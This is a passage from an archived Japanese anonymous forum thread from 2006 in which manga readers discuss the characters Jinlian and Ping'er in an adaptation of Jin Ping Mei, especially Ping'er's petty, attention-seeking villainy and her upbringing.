たまにはいい子エピを読んでみたい気もするけど
もう目覚めちゃったから無理かなあ。



328 :花と名無しさん:2006/12/29(金) 01:09:05 ID:???0
たしかに、「悪を自覚している方が強い」という原典とも通じる
キンペテイストが、単純な勧善懲悪みたいになってる感じも少しあるよね…
金蓮は悪女ながらサバサバした正義漢、瓶児は救いようのないバカ、悪、みたいな。
けなすわけじゃないが、キンペのスリリングな面白さを維持するには、
そうした路線のマンネリ化は避けて欲しいところだ。
フウが天然瓶児につくことで新しい展開を期待できると思うけど、
「フウも瓶児にイタイ目に遭わされれば」って、フウも早々に瓶児を
切る伏線を張ってるのかな〜竹崎さん。

329 :花と名無しさん:2006/12/29(金) 01:38:37 ID:???O
ピカレスクではなく、リアルで嫌な気分になる小物な悪だよね>今の瓶児
ここまで悪い役にしてしまったら今更コミック書き下ろし漫画のネタにもできないね。

330 :花と名無しさん:2006/12/29(金) 12:23:13 ID:???0
金蓮のお茶に豚の小便を入れた雪娥が
厨房担当というポジションに誇りを持ってることになってるから
その点は大丈夫じゃないかと>瓶児のちょっといいエピソード
真の料理人はそんなことはそんなことしねえw

331 :花と名無しさん:2006/12/29(金) 12:57:22 ID:???O
金蓮以外がお腹壊した瓶児の料理ってどんなんだろ?
生肉点心とか?w

332 :花と名無しさん:2006/12/29(金) 13:46:55 ID:???O
見かけはまともらしいからな。
味見しないで適当作ったか、手や材料を洗わなかったか。

333 :花と名無しさん:2006/12/29(金) 14:34:12 ID:???0
点心なら中身が生でも食べるまで分からないから生肉に一票。

一人平気な金蓮はさすが逞ましいな

334 :花と名無しさん:2006/12/29(金) 17:58:41 ID:???0
金蓮は一口食べただけですぐに胃薬も飲んだって言ってたしねw

瓶児のイタタぶりは前のお世話役といい人に注意されたことなく育ったせい
のようなとこあるね「貴方は何も悪くありませんおかわいそう」とか大旦那様の甘言とか
他の奥様方と違って恵まれた(ある意味恵まれてないかな?)世間知らずのお嬢様って感じ

335 :花と名無しさん:2006/12/29(金) 18:11:41 ID:???O
しかし真性の天然お嬢様と考えるには計算高い部分があるのも事実。
ここでこういう行動を起こせば点数稼げるわ!みたいな。
微妙なせこさだか小賢しさがあるw

336 :花と名無しさん:2006/12/29(金) 19:27:50 ID:???0
結構自己顕示欲も強いよね>瓶児
私を無視してて〜というのも今回もでてきてるし
目立ってチヤホヤされたいという意識から他人に入れ知恵するからダメになっちゃうんだな
こういうキャラはムカツクけどいた方が面白いw

337 :花と名無しさん:2006/12/29(金) 20:10:08 ID:???0
きちんと教育されてないと、生まれが良くてもそういう風になるんじゃない?
「本物のお嬢様」が自己顕示欲を上手くコントロールしたり、上品に振舞えるのは
成長の過程で周囲が注意したり誘導したりと、質の高い教育を施した結果なんだろうし。

今月号はまだ読んでないけど、
瓶児は「自分を良く見せたい」とか「チヤホヤして欲しい」とかの、誰でも持ってる子供っぽい欲望を
大人の理性で包まずに、むき出しのままにしてるように見える。
周りから精神的な躾を受けずに、子供のままなんじゃないかな。



98 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)